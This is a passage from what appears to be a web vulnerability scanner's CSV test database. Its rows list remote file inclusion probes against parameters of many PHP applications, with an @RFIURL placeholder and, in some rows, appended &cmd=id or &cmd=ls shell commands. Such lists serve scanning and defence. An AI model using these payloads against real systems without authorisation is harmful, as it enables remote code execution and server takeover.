(https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003969\",\"5292\",\"c\",\"/DON3/applications/don3_requiem.don3app/don3_requiem.php?app_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003970\",\"5292\",\"c\",\"/DON3/applications/frontpage.don3app/frontpage.php?app_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003971\",\"5292\",\"c\",\"/Dir_phNNTP/article-raw.php?file_newsportal=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003972\",\"5292\",\"c\",\"/DynaTracker_v151/action.php?base_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003973\",\"5292\",\"c\",\"/DynaTracker_v151/includes_handler.php?base_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003974\",\"5292\",\"c\",\"/Easysite-2.0_path/configuration/browser.php?EASYSITE_BASE=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003975\",\"5292\",\"c\",\"/Ex/modules/threadstop/threadstop.php?exbb[home_path]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003976\",\"5292\",\"c\",\"/Ex/modules/threadstop/threadstop.php?new_exbb[home_path]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003977\",\"5292\",\"c\",\"/Exophpdesk_PATH/pipe.php?lang_file=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003978\",\"5292\",\"c\",\"/FirstPost/block.php?Include=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003979\",\"5292\",\"c\",\"/Flickrclient.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003980\",\"5292\",\"c\",\"/FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003981\",\"5292\",\"c\",\"/FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003982\",\"5292\",\"c\",\"/Full_Release/include/body_comm.inc.php?content=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003983\",\"5292\",\"c\",\"/Gallery/displayCategory.php?basepath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003984\",\"5292\",\"c\",\"/Include/lib.inc.php3?Include=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003985\",\"5292\",\"c\",\"/Include/variables.php3?Include=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003986\",\"5292\",\"c\",\"/Jobline/admin.jobline.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003987\",\"5292\",\"c\",\"/ListRecords.php?lib_dir=@RFIURL?&cmd=id\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003988\",\"5292\",\"c\",\"/Lorev1/third_party/phpmailer/class.phpmailer.php?lang_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003989\",\"5292\",\"c\",\"/MOD_forum_fields_parse.php?phpbb_root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003990\",\"5292\",\"c\",\"/Mamblog/admin.mamblog.php?cfgfile=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003991\",\"5292\",\"c\",\"/Net_DNS_PATH/DNS/RR.php?phpdns_basedir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003992\",\"5292\",\"c\",\"/NuclearBB/tasks/send_queued_emails.php?root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003993\",\"5292\",\"c\",\"/NuclearBB/tasks/send_queued_emails.php?root_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003994\",\"5292\",\"c\",\"/OpenSiteAdmin/indexFooter.php?path=@RFIURL%00\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003995\",\"5292\",\"c\",\"/OpenSiteAdmin/pages/pageHeader.php?path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003996\",\"5292\",\"c\",\"/OpenSiteAdmin/scripts/classes/DatabaseManager.php?path=@RFIURL%00\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003997\",\"5292\",\"c\",\"/OpenSiteAdmin/scripts/classes/FieldManager.php?path=@RFIURL%00\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003998\",\"5292\",\"c\",\"/OpenSiteAdmin/scripts/classes/Filter.php?path=@RFIURL%00\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"003999\",\"5292\",\"c\",\"/OpenSiteAdmin/scripts/classes/Filters/SingleFilter.php?path=@RFIURL%00\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004000\",\"5292\",\"c\",\"/OpenSiteAdmin/scripts/classes/Form.php?path=@RFIURL%00\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004001\",\"5292\",\"c\",\"/OpenSiteAdmin/scripts/classes/FormManager.php?path=@RFIURL%00\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004002\",\"5292\",\"c\",\"/OpenSiteAdmin/scripts/classes/LoginManager.php?path=@RFIURL%00\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004003\",\"5292\",\"c\",\"/PHP/includes/header.inc.php?root=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004004\",\"5292\",\"c\",\"/PHPDJ_v05/dj/djpage.php?page=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004005\",\"5292\",\"c\",\"/PHPDJ_v05/dj/djpage.php?page=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004006\",\"5292\",\"c\",\"/PaTh/index.php?rootpath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004007\",\"5292\",\"c\",\"/Path_Script/createurl.php?formurl=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004008\",\"5292\",\"c\",\"/PhotoCart/adminprint.php?admin_folder=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004009\",\"5292\",\"c\",\"/Picssolution/install/config.php?path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004010\",\"5292\",\"c\",\"/Picssolution/install/config.php?path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004011\",\"5292\",\"c\",\"/RGboard/include/footer.php?_path[counter]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004012\",\"5292\",\"c\",\"/SPIP-v1-7-2/inc-calcul.php3?squelette_cache=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004013\",\"5292\",\"c\",\"/SQuery/lib/gore.php?libpath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004014\",\"5292\",\"c\",\"/SazCart/admin/alayouts/default/pages/login.php?_saz[settings][site_url]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004015\",\"5292\",\"c\",\"/SazCart/layouts/default/header.saz.php?_saz[settings][site_dir]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004016\",\"5292\",\"c\",\"/ScriptPage/source/includes/load_forum.php?mfh_root_path=@RFIURL \",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004017\",\"5292\",\"c\",\"/ScriptPath/footers.php?tinybb_footers=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004018\",\"5292\",\"c\",\"/ScriptPath/index.php?page=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004019\",\"5292\",\"c\",\"/Script_Path/config.inc.php?_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004020\",\"5292\",\"c\",\"/Scripts/app_and_readme/navigator/index.php?page=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004021\",\"5292\",\"c\",\"/Scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004022\",\"5292\",\"c\",\"/Somery/team.php?checkauth=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004023\",\"5292\",\"c\",\"/Upload/install.php?skindir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004024\",\"5292\",\"c\",\"/Widgets/Base/Footer.php?sys_dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004025\",\"5292\",\"c\",\"/Widgets/Base/widget.BifContainer.php?sys_dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004026\",\"5292\",\"c\",\"/Widgets/Base/widget.BifRoot.php?sys_dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004027\",\"5292\",\"c\",\"/Widgets/Base/widget.BifRoot2.php?sys_dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004028\",\"5292\",\"c\",\"/Widgets/Base/widget.BifRoot3.php?sys_dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004029\",\"5292\",\"c\",\"/Widgets/Base/widget.BifWarning.php?sys_dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004030\",\"5292\",\"c\",\"/WordPress_Files/All_Users/wp-content/plugins/Enigma2.php?boarddir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004031\",\"5292\",\"c\",\"/[path]/mybic_server.php?file=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004032\",\"5292\",\"c\",\"/[path]/previewtheme.php?theme=1&inc_path=@RFIURL?cmd\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004033\",\"5292\",\"c\",\"/_administration/securite.php?cfg[document_uri]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004034\",\"5292\",\"c\",\"/_blogadata/include/struct_admin.php?incl_page=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004035\",\"5292\",\"c\",\"/_conf/_php-core/common-tpl-vars.php?admindir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004036\",\"5292\",\"c\",\"/_connect.php?root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004037\",\"5292\",\"c\",\"/_friendly/core/data/_load.php?friendly_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004038\",\"5292\",\"c\",\"/_friendly/core/data/yaml.inc.php?friendly_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004039\",\"5292\",\"c\",\"/_friendly/core/display/_load.php?friendly_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004040\",\"5292\",\"c\",\"/_friendly/core/support/_load.php?friendly_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004041\",\"5292\",\"c\",\"/_functions.php?prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004042\",\"5292\",\"c\",\"/_includes/settings.inc.php?approot=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004043\",\"5292\",\"c\",\"/_theme/breadcrumb.php?rootBase=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004044\",\"5292\",\"c\",\"/_wk/wk_lang.php?WK[wkPath]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004045\",\"5292\",\"c\",\"/abf_js.php?abs_pfad=@RFIURL?&cmd=id\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004046\",\"5292\",\"c\",\"/about.php?CONFIG[MWCHAT_Libs]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004047\",\"5292\",\"c\",\"/about.php?bibtexrootrel=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004048\",\"5292\",\"c\",\"/aboutinfo.php?bibtexrootrel=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004049\",\"5292\",\"c\",\"/acc.php?page=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004050\",\"5292\",\"c\",\"/access/login.php?path_to_root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004051\",\"5292\",\"c\",\"/account.php?insPath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004052\",\"5292\",\"c\",\"/accsess/login.php?path_to_root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004053\",\"5292\",\"c\",\"/active/components/xmlrpc/client.php?c[components]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004054\",\"5292\",\"c\",\"/ad_main.php?_mygamefile=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004055\",\"5292\",\"c\",\"/add.cgi.php?blog_theme=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004056\",\"5292\",\"c\",\"/add_link.php?blog_theme=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004057\",\"5292\",\"c\",\"/addpost_newpoll.php?addpoll=preview&thispath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004058\",\"5292\",\"c\",\"/addressbook.php?GLOBALS[basedir]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004059\",\"5292\",\"c\",\"/addsite.php?returnpath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004060\",\"5292\",\"c\",\"/addvip.php?msetstr[\\\"PROGSDIR\\\"]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004061\",\"5292\",\"c\",\"/adm/krgourl.php?DOCUMENT_ROOT=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004062\",\"5292\",\"c\",\"/adm/my_statistics.php?DOCUMENT_ROOT=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004063\",\"5292\",\"c\",\"/admin.loudmouth.php?mainframe=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004064\",\"5292\",\"c\",\"/admin.php?Madoa=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004065\",\"5292\",\"c\",\"/admin.php?cal_dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004066\",\"5292\",\"c\",\"/admin.php?env_dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004067\",\"5292\",\"c\",\"/admin.php?lang=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004068\",\"5292\",\"c\",\"/admin.php?page[path]=@RFIURL?&cmd=ls\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004069\",\"5292\",\"c\",\"/admin.php?submit=submit&form_include_template=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004070\",\"5292\",\"c\",\"/admin/PLUGINs/NP_UserSharing.php?DIR_ADMIN=@RFIURL?admin\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004071\",\"5292\",\"c\",\"/admin/ST_countries.php?include_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004072\",\"5292\",\"c\",\"/admin/ST_platforms.php?include_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004073\",\"5292\",\"c\",\"/admin/addentry.php?phpbb_root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004074\",\"5292\",\"c\",\"/admin/addentry.php?phpbb_root_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004075\",\"5292\",\"c\",\"/admin/addons/archive/archive.php?adminfolder=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004076\",\"5292\",\"c\",\"/admin/admin.php?path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004077\",\"5292\",\"c\",\"/admin/admin.php?site_url=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004078\",\"5292\",\"c\",\"/admin/admin_forgotten_password.php?root_folder_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004079\",\"5292\",\"c\",\"/admin/admin_news_bot.php?root_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004080\",\"5292\",\"c\",\"/admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004081\",\"5292\",\"c\",\"/admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004082\",\"5292\",\"c\",\"/admin/admin_users.php?phpbb_root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004083\",\"5292\",\"c\",\"/admin/auth.php?xcart_dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004084\",\"5292\",\"c\",\"/admin/auth.php?xcart_dir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list 